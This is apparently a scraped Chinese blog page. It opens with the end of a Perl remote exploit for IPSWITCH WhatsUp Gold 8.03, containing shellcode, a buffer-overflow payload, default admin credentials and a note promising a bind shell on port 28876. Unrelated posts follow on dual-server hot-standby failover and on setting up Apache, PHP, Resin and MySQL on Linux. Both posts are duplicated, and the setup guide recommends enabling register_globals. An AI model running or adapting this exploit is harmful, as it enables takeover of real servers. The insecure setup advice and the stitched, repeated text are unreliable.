"\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b".
"\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32".
"\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff".
"\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe".
"\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff".
"\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89".
"\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff".
"\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a".
"\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb".
"\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0".
"\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44".
"\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b".
"\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff".
"\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff".
"\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0".
"\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to the host.\n";
$socket->autoflush(1);
print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel,
application/msword, application/x-shockwave-flash,
application/vnd.citrix.AdvGWClient-2_2, */*\r\n";
print $socket "Referer:
http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n";
print $socket "Accept-Language: en-us\r\nContent-Type:
application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n";
print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1; T312461; .NET CLR 1.1.4322)\r\n";
print $socket "Host: 127.0.0.1\r\nContent-Length: ";
my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename=";
#[-------815-------------] [ret] [-------------4080---------]
#[A.....811...A][jmp] [ret] [nops][shc][E.......E ]
$cmd .= "A"x811; #815 -4
$cmd .= "\xeb\x06\x90\x90"; #jumper <eb + 06> <garbage> jmp to shellcode
#$cmd .= "\xfe\x63\xa1\x71"; #winXP SP1 ws2help.dll
$cmd .= "\xc4\x2a\x02\x75"; #win2k sp0-sp4 ws2help.dll
#$cmd .= "LOWNOISE"; #garbage :D
$cmd .= "\x90"x2080;
$cmd .= $shellcode;
$cmd .= "E"x(2000-length($shellcode)); #mas basura
$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic
YWRtaW46YWRtaW4=\r\n\r\n";
print $socket $cmd."\r\n";
close($socket);
exit(0);
sub usage
{
print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n";
print "===================================================\n";
print "\nUsage: NotmuchG.pl [host] [port]\n";
print "[host] Target host\n[port] WhatsUp webserver port\n\n";
print "\n Shell on tcp port 28876.\n\n";
print "ET LoWNOISE 2004\n";
exit(1);
}
[ 2004/11/06 00:18 | by 网络毛毛虫 ]
各关键业务单位对服务器应用系统的安全性,可用性,依赖性较强,关键应用24小时不允许停机,在这种情况下,服务器的双机热备就显的非常必要及迫切。
双机热备是近年来服务器端的安全性,可用性的一次重大的革命。从以前加大的硬件可用性,到现在的双机备用,来保证服务器的不停机运行,是高可用性的一次重大的进步。
双机热备的原理:是当一台服务器在工作时(称为主机)。另一台服务器作备用状态(称为备机)。当主机因为某种原因出现故障,如死机,主机断电,病毒发作,硬盘损坏等,不能继续提供服务时,从机能够在规定的时间内接替主机的服务,继续提供服务,从而达到不停机的服务。
典型用户环境简介
用户服务器操作系统使用的是Windows NT、WIN2000、SCO OPENSERVER,数据库为SQL SERVER、ORACAL、Sybase,客户端的使用的是管理系统。
其中数据库是重点的保护对象。
设计的以下双机容错解决方案:
一:用户硬件环境:
服务器主机,配置如下:CPU PIII1.13以上,1G ECC内存,18GB硬盘2块RAID1。
磁盘柜一台, U3 18GB或更大容量SCSI热插拔硬盘3块以上。
二:软件环境:
操作系统一套;数据库系统一套。
双机容错软件(ROSE HA或其它OEM ROSE双机软件) 一套
三:网络拓扑图:
双机的应用包括双机互被援(Dual Active);双机热备份(Hot Standby)
双机互被援工作原理是两台服务器均为工作机,在正常情况下,两台工作机均为信息系统提供支持,并互相检测对方的运行情况。当一台主机出现异常时,不能支持信息系统正常运营,另一主机主动接管异常机的工作,继续支持信息的运营,从而保证信息系统能够不间断的运行。
双机热备份的工作原理就是一台主机为工作机(Primary Server),另一台主机为备份机(Standby Server),在系统正常情况下,工作机为信息系统提供服务,备份机监视工作机的运行情况(工作机同时也在检测备份机是否正常),当工作机出现异常,不能支持信息系统运营时,备份机主动接管工作机的工作,继续支持信息的服务,保证系统不间断的运行。
双机能实现的功能
● 服务器停电时,能实现自动切换
● 服务器的硬盘、CPU、RAM发生故障时,实现自动切换
● 网络连接发生故障时(如网卡、网线故障),实现自动切换
● 操作系统、数据库或应用程序发生故障时,应能实现自动切换
● 提供手动切换功能,使系统管理员可以在主机负载过大时或其它适当的时候,实现手动切换。
● 安全完成切换多次
● 互相检测机器的工作状态,保证双机的可靠性
● 保留完整的系统日志
三、安装方法:
1、先把主机的数据库移到一台备用的服务器上,并调试成功,供用户使用。
2、安装两台服务器,首先,创建磁盘阵列的RAID5保护机制,主要步骤是:在主机做RAID5,做完后再在从机做RAID5。
3、开始安装操作系统软件包。
4、安装双机软件,并做卷的保护,以下安装数据库软件,把应用系统安装在服务器硬盘上,数据库安装在磁盘阵列上。
5、做双机软件的数据库资源保护。在新装的数据库中恢复备用机的数据库数据。
四,做切换实验:(双机软件)
切换实验步骤如下:
1:手工切换,在系统的正常的情况下,手工从主机切到备机,这种功能主要用于系统的定期维护。实验结果,切换正常。
2:宕机切换,这种切换模拟服务器突然出现故障的情况,在这种情况下,备机应在规定的时间内起动数据库服务,并开始对外服务。实验结果,切换正常。
3:模拟网卡故障,双机软件对系统资源有检测能力,当网卡出现故障后,客户机找不到此IP地址,故客户机无法使用,在这种情况下,双机软件应检测到此故障,并切往备用机,制造此故障,我们用拔网线的方法,此时用户无法登录。实验结果是双机软件检测到此故障,并切到备用机。
4:模拟数据库故障:双机软件还可以对数据库进行检测,当操作系统正常的情况下,数据库出现故障,此时双机软件同样可以检测到此故障,实验结果是,主机资源切换到备用服务器。
五、验收结果
由以上的切换实验,可以得出双机软件应是可靠的主机容错系统,它支持开放的大型数据库系统,并提供最多的容错能力(如操作系统,数据库,网卡等)。适合于企事业单位本身要求计算机网络系统具有高可靠,高可用性而且网络系统可以可靠、高速、稳定的运行。
在出现故障的情况下,双机软件会将保护资源自动转换到一个根据优先权而设定的系统。在实际进行切换用户时, 会经历一个十分短暂的休眠,但是,当系统完成了切换操作后,双机软件会在所选择的系统上自动地恢复操作。
1、可以被双机软件保护起来的资源是:
1、 卷(Volume)
2、 IP 地址
3、 共享文件
4、 LAN(局域网)管理器服务器名称
5、 应用程序
6、 定义的用户
7、 MSCS应用程序
2、心跳故障检测
双机软件在集群节点间保持着间歇的通信信号,也叫做心跳信号,是错误检测的一个机制。即通过每一个通信路径,在两个对等系统之间进行周期性的握手,如果连续没有收到的心跳信号到了一定的数目,双机软件就把这条路径标示为失效。
如果你只定义了一条通信路径,当双机软件把这唯一的一条通信路径标为失效时,双机软件便立即开始恢复过程。然而,如果你有冗余路径, 双机软件能够通过第二条路径确定是系统故障还是只是通信路径有问题。如果双机软件开启优先级第二的通信路径并收到了心跳信号,它就不开始双机软件恢复,只需要把第一条通信路径标成红色,作为信号告诉你需要修理一下有故障的路径。
一般情况下双机软件只在下列事件发生时,启动系统恢复功能:
1、 所有的通信路径故障。如果所有节点都没能收到心跳信号, 把所有通信路径都标为失效,双机软件开始安全检查。
2、 安全检查失败。当所有通信路径故障时,双机软件向整个网络发出安全检查信号。如果信号指出配对系统还“活”着的时候,双机软件不启动Failover。如果安全检查没从配对节点返回信号,Rose ha 就开始Failover。
因而,为了减少由于潜在的通讯错误所引起的不必要的系统切换,建议您使用不同介质的多条通信路径。
3、 通信路径
双机软件支持在节点之间和心跳通讯中,使用如下通讯路径:
(1) socket,即套接字。你使用任何的网络硬件接口,只要它能够支持TCP/IP的通讯协议。这样的硬件包括:以太网、快速以网、令牌环网以及FDDI 或CDDI 。
(2)串行口 在双机软件配置中, 你应当配置有一个串行口通信路径。串口通信路径需要利用RS232的拟调解线路来与双机软件系统相连接。
( 3)共享磁盘 你可以定义一个共享磁盘分区来作为双机软件的通讯中介。可以只使用小至1MB的分区,当然,也可以使用更大的空间。
双机软件假定,当通过心跳信号检测其它服务器失败时,则认为此服务器是关闭的。因此,为了避免不必要的失效切换,最好建立两种以上独立的物理路径,使用至少两种心跳。
双机热备是近年来服务器端的安全性,可用性的一次重大的革命。从以前加大的硬件可用性,到现在的双机备用,来保证服务器的不停机运行,是高可用性的一次重大的进步。
双机热备的原理:是当一台服务器在工作时(称为主机)。另一台服务器作备用状态(称为备机)。当主机因为某种原因出现故障,如死机,主机断电,病毒发作,硬盘损坏等,不能继续提供服务时,从机能够在规定的时间内接替主机的服务,继续提供服务,从而达到不停机的服务。
典型用户环境简介
用户服务器操作系统使用的是Windows NT、WIN2000、SCO OPENSERVER,数据库为SQL SERVER、ORACAL、Sybase,客户端的使用的是管理系统。
其中数据库是重点的保护对象。
设计的以下双机容错解决方案:
一:用户硬件环境:
服务器主机,配置如下:CPU PIII1.13以上,1G ECC内存,18GB硬盘2块RAID1。
磁盘柜一台, U3 18GB或更大容量SCSI热插拔硬盘3块以上。
二:软件环境:
操作系统一套;数据库系统一套。
双机容错软件(ROSE HA或其它OEM ROSE双机软件) 一套
三:网络拓扑图:
双机的应用包括双机互被援(Dual Active);双机热备份(Hot Standby)
双机互被援工作原理是两台服务器均为工作机,在正常情况下,两台工作机均为信息系统提供支持,并互相检测对方的运行情况。当一台主机出现异常时,不能支持信息系统正常运营,另一主机主动接管异常机的工作,继续支持信息的运营,从而保证信息系统能够不间断的运行。
双机热备份的工作原理就是一台主机为工作机(Primary Server),另一台主机为备份机(Standby Server),在系统正常情况下,工作机为信息系统提供服务,备份机监视工作机的运行情况(工作机同时也在检测备份机是否正常),当工作机出现异常,不能支持信息系统运营时,备份机主动接管工作机的工作,继续支持信息的服务,保证系统不间断的运行。
双机能实现的功能
● 服务器停电时,能实现自动切换
● 服务器的硬盘、CPU、RAM发生故障时,实现自动切换
● 网络连接发生故障时(如网卡、网线故障),实现自动切换
● 操作系统、数据库或应用程序发生故障时,应能实现自动切换
● 提供手动切换功能,使系统管理员可以在主机负载过大时或其它适当的时候,实现手动切换。
● 安全完成切换多次
● 互相检测机器的工作状态,保证双机的可靠性
● 保留完整的系统日志
三、安装方法:
1、先把主机的数据库移到一台备用的服务器上,并调试成功,供用户使用。
2、安装两台服务器,首先,创建磁盘阵列的RAID5保护机制,主要步骤是:在主机做RAID5,做完后再在从机做RAID5。
3、开始安装操作系统软件包。
4、安装双机软件,并做卷的保护,以下安装数据库软件,把应用系统安装在服务器硬盘上,数据库安装在磁盘阵列上。
5、做双机软件的数据库资源保护。在新装的数据库中恢复备用机的数据库数据。
四,做切换实验:(双机软件)
切换实验步骤如下:
1:手工切换,在系统的正常的情况下,手工从主机切到备机,这种功能主要用于系统的定期维护。实验结果,切换正常。
2:宕机切换,这种切换模拟服务器突然出现故障的情况,在这种情况下,备机应在规定的时间内起动数据库服务,并开始对外服务。实验结果,切换正常。
3:模拟网卡故障,双机软件对系统资源有检测能力,当网卡出现故障后,客户机找不到此IP地址,故客户机无法使用,在这种情况下,双机软件应检测到此故障,并切往备用机,制造此故障,我们用拔网线的方法,此时用户无法登录。实验结果是双机软件检测到此故障,并切到备用机。
4:模拟数据库故障:双机软件还可以对数据库进行检测,当操作系统正常的情况下,数据库出现故障,此时双机软件同样可以检测到此故障,实验结果是,主机资源切换到备用服务器。
五、验收结果
由以上的切换实验,可以得出双机软件应是可靠的主机容错系统,它支持开放的大型数据库系统,并提供最多的容错能力(如操作系统,数据库,网卡等)。适合于企事业单位本身要求计算机网络系统具有高可靠,高可用性而且网络系统可以可靠、高速、稳定的运行。
在出现故障的情况下,双机软件会将保护资源自动转换到一个根据优先权而设定的系统。在实际进行切换用户时, 会经历一个十分短暂的休眠,但是,当系统完成了切换操作后,双机软件会在所选择的系统上自动地恢复操作。
1、可以被双机软件保护起来的资源是:
1、 卷(Volume)
2、 IP 地址
3、 共享文件
4、 LAN(局域网)管理器服务器名称
5、 应用程序
6、 定义的用户
7、 MSCS应用程序
2、心跳故障检测
双机软件在集群节点间保持着间歇的通信信号,也叫做心跳信号,是错误检测的一个机制。即通过每一个通信路径,在两个对等系统之间进行周期性的握手,如果连续没有收到的心跳信号到了一定的数目,双机软件就把这条路径标示为失效。
如果你只定义了一条通信路径,当双机软件把这唯一的一条通信路径标为失效时,双机软件便立即开始恢复过程。然而,如果你有冗余路径, 双机软件能够通过第二条路径确定是系统故障还是只是通信路径有问题。如果双机软件开启优先级第二的通信路径并收到了心跳信号,它就不开始双机软件恢复,只需要把第一条通信路径标成红色,作为信号告诉你需要修理一下有故障的路径。
一般情况下双机软件只在下列事件发生时,启动系统恢复功能:
1、 所有的通信路径故障。如果所有节点都没能收到心跳信号, 把所有通信路径都标为失效,双机软件开始安全检查。
2、 安全检查失败。当所有通信路径故障时,双机软件向整个网络发出安全检查信号。如果信号指出配对系统还“活”着的时候,双机软件不启动Failover。如果安全检查没从配对节点返回信号,Rose ha 就开始Failover。
因而,为了减少由于潜在的通讯错误所引起的不必要的系统切换,建议您使用不同介质的多条通信路径。
3、 通信路径
双机软件支持在节点之间和心跳通讯中,使用如下通讯路径:
(1) socket,即套接字。你使用任何的网络硬件接口,只要它能够支持TCP/IP的通讯协议。这样的硬件包括:以太网、快速以网、令牌环网以及FDDI 或CDDI 。
(2)串行口 在双机软件配置中, 你应当配置有一个串行口通信路径。串口通信路径需要利用RS232的拟调解线路来与双机软件系统相连接。
( 3)共享磁盘 你可以定义一个共享磁盘分区来作为双机软件的通讯中介。可以只使用小至1MB的分区,当然,也可以使用更大的空间。
双机软件假定,当通过心跳信号检测其它服务器失败时,则认为此服务器是关闭的。因此,为了避免不必要的失效切换,最好建立两种以上独立的物理路径,使用至少两种心跳。
[ 2004/11/06 00:12 | by 网络毛毛虫 ]
近年来Linux在服务器市场占有比例日渐攀升,除了缘于Linux的免费和安全性之外,还因为Linux上的应用服务日益丰富。大部分常见的服务都在Linux上有了较好的解决方案。而对于Intenet上应用最广泛的Web服务来说,Linux的表现就更为出色。谁也无法说 清Internet上究竟有多少个网站,但在众多网站中,采用PHP和JSP开发的网站无疑占居了极大的市场份额。下面就介绍一下如何在Linux上架设支持JSP+PHP+MySQL的Web服务器。
对于Web服务,apache无疑是首选。数据库方面选用MySQL,这对于一般应用也够了,当然Linux下也可以安装oracle、DB2等大型数据库,可是它们费用昂贵。至于对于开发语言的支持,JSP和PHP无疑是当前最主流和应用最广泛的web开发语言了。所有这些软件我们可以从以下网站上找到:
Resin:http://www.caucho.com/
JDK:http://java.sun.com/
Apache:http://www.apache.org
MySQL:http://www.mysql.com
PHP:http://www.php.net
MM.MySQL:http://mmmysql.sourceforge.net/
从以上网站下载对应的软件,笔者下载的软件如下:
mysql-4.0.15.tar.gz
apache_1.3.28.tar.gz
php-4.3.3.tar.gz
resin-3.0.3.tar.gz
mysql-connector-java-3.1.0-alpha.tar.gz
j2sdk-1_4_2_01-linux-i586.bin
一、安装MySQL
MySQL的安装比较简单,但是编译过程可能有点长,具体步骤如下:
# tar -xzpvf mysql-4.0.15.tar.gz
# adduser -s /bin/false mysql
# ./configure --prefix=/usr/local/terry_yu/mysql --enable-assembler
--with-innodb --with-charset=gb2312
# make
# make install
# /usr/local/terry_yu/mysql/bin/mysql_install_db
# chown -R root /usr/local/terry_yu/mysql/
# chown -R mysql /usr/local/terry_yu/mysql/var
# chgrp -R mysql /usr/local/terry_yu/mysql/
# /usr/local/terry_yu/mysql/bin/mysql_install_db
修改/etc/ld.so.conf,在最后加入以下一行:
/usr/local/terry_yu/mysql/lib/mysql/lib
然后执行以下命令:
# ldconfig
用以下命令启动MySQL
/usr/local/terry_yu/mysql/bin/mysqld_safe &
用以下命令修改MySQL的root密码:
/usr/local/terry_yu/mysql/bin/mysqladmin -uroot password abcdefg
用以下命令可以进入MySQL的命令行方式:
[root@terry root]# /usr/local/terry_yu/mysql/bin/mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 4.0.15
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> quit
Bye
出现以上信息表示MySQL已经成功运行了。
二、安装JDK
# chmod 755 j2sdk-1_4_2_01-linux-i586.bin
# ./j2sdk-1_4_2_01-linux-i586.bin
# mv j2sdk1.4.2_01/ /usr/local/terry_yu/
# cd /usr/local/terry_yu/
# ln -s j2sdk1.4.2_01/ jdk
# ln -s jdk/jre/ jre
# vi /etc/profile
JAVA_HOME=/usr/local/terry_yu/jdk
RESIN_HOME=/usr/local/terry_yu/resin
CLASSPATH=.:../$JAVA_HOME/lib:$JAVA_HOME/jre/lib:$RESIN_HOME/lib:/usr/ local/terry_yu/jdbc
PATH=$PATH:$JAVA_HOME/bin:$JAVA_HOME/jre/bin
退出当前登录的环境,重新登录,这样刚刚设定的环境变量就会生效,然后用如下命令测试:
[root@terry root]# java -version
java version "1.4.2_01"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.4.2_01-b06)
Java HotSpot(TM) Client VM (build 1.4.2_01-b06, mixed mode)
看到类似信息就表示JDK环境已经好了。其实在上面的/etc/profile中,我们不仅仅设置了JDK的环境变量,还一并设置了Resin和JDBC的环境变量,这些都是后面安装Resin所必需的设定。
三、安装MySQL的JDBC
MySQL的JDBC的相关环境变量已经在前面设置好了,所以余下的只是按以下命令安装:
# tar -xzpvf mysql-connector-java-3.1.0-alpha.tar.gz
# mv mysql-connector-java-3.1.0-alpha /usr/local/terry_yu/
# cd /usr/local/terry_yu/
# ln -s mysql-connector-java-3.1.0-alpha/ jdbc
四、安装Apache
http://apache.linuxforum.net/dist/httpd/apache_1.3.28.tar.gz
需要注意的是,编译apache时候必须加入了DSO支持,如果没有,请加入 --enable-module=so 选项重新编译apache
# tar -xzpvf apache_1.3.28.tar.gz
# cd apache_1.3.28/
# ./configure --prefix=/usr/local/terry_yu/apache --enable-module=most
--enable-shared=max
# make
# make install
察看编译进apache的模块:
#/usr/local/terry_yu/apache/bin/httpd -l
Compiled-in modules:
http_core.c
mod_so.c
看到以上的信息表明apache支持DSO方式了。这样就可以用DSO的方式把php和resin的模块加进来。
五、安装PHP
安装PHP比较简单,我们先装PHP。
# tar -xzpvf php-4.3.3.tar.gz
# cd php-4.3.3/
# ./configure --with-mysql=/usr/local/terry_yu/mysql
--with-apxs=/usr/local/terry_yu/apache/bin/apxs
# make
# make install
# cp php.ini-dist /usr/local/lib/php.ini
编辑PHP的配置文件是/usr/local/lib/php.ini,将其中的register_globals变量修改成On,默认是Off的。需要将它改成On。否则会出现php不能直接读不到post或get的数据的现象。
编辑Apache的配置文件/usr/local/terry_yu/apache/conf/httpd.conf,在文件结尾加上以下一行:
AddType application/x-httpd-php .php .php3
启动apache:
# /usr/local/terry_yu/apache/bin/apachectl start
然后可以用一个简单的php文件来测试PHP的安装,这个简单的PHP文件包含下列一行:
<? phpinfo();?>
将其保存为/usr/local/terry_yu/apache/htdocs/info.php,然后在浏览器中浏览,如果观看到以显示有“PHP Version4.3.3”标题的页面就表示整合PHP与Apache成功了。而且在这个页面中可以看到与PHP相关的选项,其中应该有关于MySQL的子项,这表明PHP已经内置了对MySQL的支持了。这样就表示PHP+MySQL+Apache的环境已经成功了,接下来是安装Resin来支持JSP环境。
六.安装Resin
http://www.caucho.com/download/resin-3.0.3.tar.gz
下载的resin的安装包解开后应该可以直接单独运行的。笔者将其解开后放到/usr/local/terry_yu目录下
# tar -xzpvf resin-3.0.3.tar.gz
# mv resin-3.0.3 /usr/local/terry_yu/
# cd /usr/local/terry_yu/
# ln -s resin-3.0.3/ resin
启动resin
# /usr/local/terry_yu/resin/bin/httpd.sh start
如果之前安装JDK时设置好了相关的环境变量,就能够从http://localhost:8080/上能看到resin的页面,这也就表示单独的resin运行成功了。然后,为了整合resin和apache,我们需要重新编译一下,以生成mod_caucho给Apache调用。
# cd /usr/local/terry_yu/resin
# ./configure --with-apache=/usr/local/terry_yu/apache
# make
# make install
修改/usr/local/terry_yu/resin/conf/resin.conf,大约在第159行(安装的resin版本不同,配置文件的内容可能有所不同),将<document-directory>修改成自己的apache的DocumentRoot的值。
<resin xmlns=http://caucho.com/ns/resin>
<server>
<host id="">
<document-directory>/usr/local/terry_yu/apache/htdocs</document-directory> ##这里修改成/usr/local/terry_yu/apache/htdocs
...
</host>
</server>
</resin>
修改/usr/local/terry_yu/apache/conf/httpd.conf,在编译resin时,安装程序已经修改过httpd.conf,不过还不完全正确,应该改成类似以下的配置,如果你完全按本文进行的安装可以直接复制这些内容:
LoadModule caucho_module libexec/mod_caucho.so
AddModule mod_caucho.c
<IfModule mod_caucho.c>
ResinConfigServer localhost 6802
<Location /caucho-status>
SetHandler caucho-status
</Location>
</IfModule>
修改完后,重新启动resin后生效:
/usr/local/terry_yu/resin/bin/httpd.sh restart
/usr/local/terry_yu/apache/bin/apachectl restart
通过浏览器去访问http://localhost/caucho-status/,如果出现以下页面刚表示resin和apache已经成功整合了。
然后再测试一下JSP对数据库的访问,在/usr/local/apache/htdocs/下面用jsp写一个简单的jsp文件来连接本机的MySQL数据库:
vi /usr/local/terry_yu/apache/htdocs/testdb.jsp
输入以下内容,可以直接粘贴:
<html>
<head>
<title>Test JDBC For MySQL</title>
</head>
<body>
<%@ page contentType="text/html;charset=gb2312" %>
<%
Class.forName("com.mysql.jdbc.Driver").newInstance();
java.sql.Connection conn;
conn =
java.sql.DriverManager.getConnection("jdbc:mysql://localhost/mysql?user=root&password=abcdefg");
%>
</body>
</html>
通过浏览器去访问http://localhost/testdb,如果看到了一个没有任何错误信息的空白页面,就表示jsp连接本机的MySQL数据库成功了,至此我们就完成了一个支持JSP+PHP+MySQL的Web服务器。
注:以上所有安装都是在Red Hat Linux9.0上完成的,所使用软件也均为目前(2003年9月)最新的版本。
本文介绍了如何在Linux上架设同时支持JSP和PHP的Web Server,演示了MySQL、JDK、JDBC、Apache、PHP、Resin的安装和简单测试过程。
对于Web服务,apache无疑是首选。数据库方面选用MySQL,这对于一般应用也够了,当然Linux下也可以安装oracle、DB2等大型数据库,可是它们费用昂贵。至于对于开发语言的支持,JSP和PHP无疑是当前最主流和应用最广泛的web开发语言了。所有这些软件我们可以从以下网站上找到:
Resin:http://www.caucho.com/
JDK:http://java.sun.com/
Apache:http://www.apache.org
MySQL:http://www.mysql.com
PHP:http://www.php.net
MM.MySQL:http://mmmysql.sourceforge.net/
从以上网站下载对应的软件,笔者下载的软件如下:
mysql-4.0.15.tar.gz
apache_1.3.28.tar.gz
php-4.3.3.tar.gz
resin-3.0.3.tar.gz
mysql-connector-java-3.1.0-alpha.tar.gz
j2sdk-1_4_2_01-linux-i586.bin
一、安装MySQL
MySQL的安装比较简单,但是编译过程可能有点长,具体步骤如下:
# tar -xzpvf mysql-4.0.15.tar.gz
# adduser -s /bin/false mysql
# ./configure --prefix=/usr/local/terry_yu/mysql --enable-assembler
--with-innodb --with-charset=gb2312
# make
# make install
# /usr/local/terry_yu/mysql/bin/mysql_install_db
# chown -R root /usr/local/terry_yu/mysql/
# chown -R mysql /usr/local/terry_yu/mysql/var
# chgrp -R mysql /usr/local/terry_yu/mysql/
# /usr/local/terry_yu/mysql/bin/mysql_install_db
修改/etc/ld.so.conf,在最后加入以下一行:
/usr/local/terry_yu/mysql/lib/mysql/lib
然后执行以下命令:
# ldconfig
用以下命令启动MySQL
/usr/local/terry_yu/mysql/bin/mysqld_safe &
用以下命令修改MySQL的root密码:
/usr/local/terry_yu/mysql/bin/mysqladmin -uroot password abcdefg
用以下命令可以进入MySQL的命令行方式:
[root@terry root]# /usr/local/terry_yu/mysql/bin/mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 4.0.15
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> quit
Bye
出现以上信息表示MySQL已经成功运行了。
二、安装JDK
# chmod 755 j2sdk-1_4_2_01-linux-i586.bin
# ./j2sdk-1_4_2_01-linux-i586.bin
# mv j2sdk1.4.2_01/ /usr/local/terry_yu/
# cd /usr/local/terry_yu/
# ln -s j2sdk1.4.2_01/ jdk
# ln -s jdk/jre/ jre
# vi /etc/profile
JAVA_HOME=/usr/local/terry_yu/jdk
RESIN_HOME=/usr/local/terry_yu/resin
CLASSPATH=.:../$JAVA_HOME/lib:$JAVA_HOME/jre/lib:$RESIN_HOME/lib:/usr/ local/terry_yu/jdbc
PATH=$PATH:$JAVA_HOME/bin:$JAVA_HOME/jre/bin
退出当前登录的环境,重新登录,这样刚刚设定的环境变量就会生效,然后用如下命令测试:
[root@terry root]# java -version
java version "1.4.2_01"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.4.2_01-b06)
Java HotSpot(TM) Client VM (build 1.4.2_01-b06, mixed mode)
看到类似信息就表示JDK环境已经好了。其实在上面的/etc/profile中,我们不仅仅设置了JDK的环境变量,还一并设置了Resin和JDBC的环境变量,这些都是后面安装Resin所必需的设定。
三、安装MySQL的JDBC
MySQL的JDBC的相关环境变量已经在前面设置好了,所以余下的只是按以下命令安装:
# tar -xzpvf mysql-connector-java-3.1.0-alpha.tar.gz
# mv mysql-connector-java-3.1.0-alpha /usr/local/terry_yu/
# cd /usr/local/terry_yu/
# ln -s mysql-connector-java-3.1.0-alpha/ jdbc
四、安装Apache
http://apache.linuxforum.net/dist/httpd/apache_1.3.28.tar.gz
需要注意的是,编译apache时候必须加入了DSO支持,如果没有,请加入 --enable-module=so 选项重新编译apache
# tar -xzpvf apache_1.3.28.tar.gz
# cd apache_1.3.28/
# ./configure --prefix=/usr/local/terry_yu/apache --enable-module=most
--enable-shared=max
# make
# make install
察看编译进apache的模块:
#/usr/local/terry_yu/apache/bin/httpd -l
Compiled-in modules:
http_core.c
mod_so.c
看到以上的信息表明apache支持DSO方式了。这样就可以用DSO的方式把php和resin的模块加进来。
五、安装PHP
安装PHP比较简单,我们先装PHP。
# tar -xzpvf php-4.3.3.tar.gz
# cd php-4.3.3/
# ./configure --with-mysql=/usr/local/terry_yu/mysql
--with-apxs=/usr/local/terry_yu/apache/bin/apxs
# make
# make install
# cp php.ini-dist /usr/local/lib/php.ini
编辑PHP的配置文件是/usr/local/lib/php.ini,将其中的register_globals变量修改成On,默认是Off的。需要将它改成On。否则会出现php不能直接读不到post或get的数据的现象。
编辑Apache的配置文件/usr/local/terry_yu/apache/conf/httpd.conf,在文件结尾加上以下一行:
AddType application/x-httpd-php .php .php3
启动apache:
# /usr/local/terry_yu/apache/bin/apachectl start
然后可以用一个简单的php文件来测试PHP的安装,这个简单的PHP文件包含下列一行:
<? phpinfo();?>
将其保存为/usr/local/terry_yu/apache/htdocs/info.php,然后在浏览器中浏览,如果观看到以显示有“PHP Version4.3.3”标题的页面就表示整合PHP与Apache成功了。而且在这个页面中可以看到与PHP相关的选项,其中应该有关于MySQL的子项,这表明PHP已经内置了对MySQL的支持了。这样就表示PHP+MySQL+Apache的环境已经成功了,接下来是安装Resin来支持JSP环境。
六.安装Resin
http://www.caucho.com/download/resin-3.0.3.tar.gz
下载的resin的安装包解开后应该可以直接单独运行的。笔者将其解开后放到/usr/local/terry_yu目录下
# tar -xzpvf resin-3.0.3.tar.gz
# mv resin-3.0.3 /usr/local/terry_yu/
# cd /usr/local/terry_yu/
# ln -s resin-3.0.3/ resin
启动resin
# /usr/local/terry_yu/resin/bin/httpd.sh start
如果之前安装JDK时设置好了相关的环境变量,就能够从http://localhost:8080/上能看到resin的页面,这也就表示单独的resin运行成功了。然后,为了整合resin和apache,我们需要重新编译一下,以生成mod_caucho给Apache调用。
# cd /usr/local/terry_yu/resin
# ./configure --with-apache=/usr/local/terry_yu/apache
# make
# make install
修改/usr/local/terry_yu/resin/conf/resin.conf,大约在第159行(安装的resin版本不同,配置文件的内容可能有所不同),将<document-directory>修改成自己的apache的DocumentRoot的值。
<resin xmlns=http://caucho.com/ns/resin>
<server>
<host id="">
<document-directory>/usr/local/terry_yu/apache/htdocs</document-directory> ##这里修改成/usr/local/terry_yu/apache/htdocs
...
</host>
</server>
</resin>
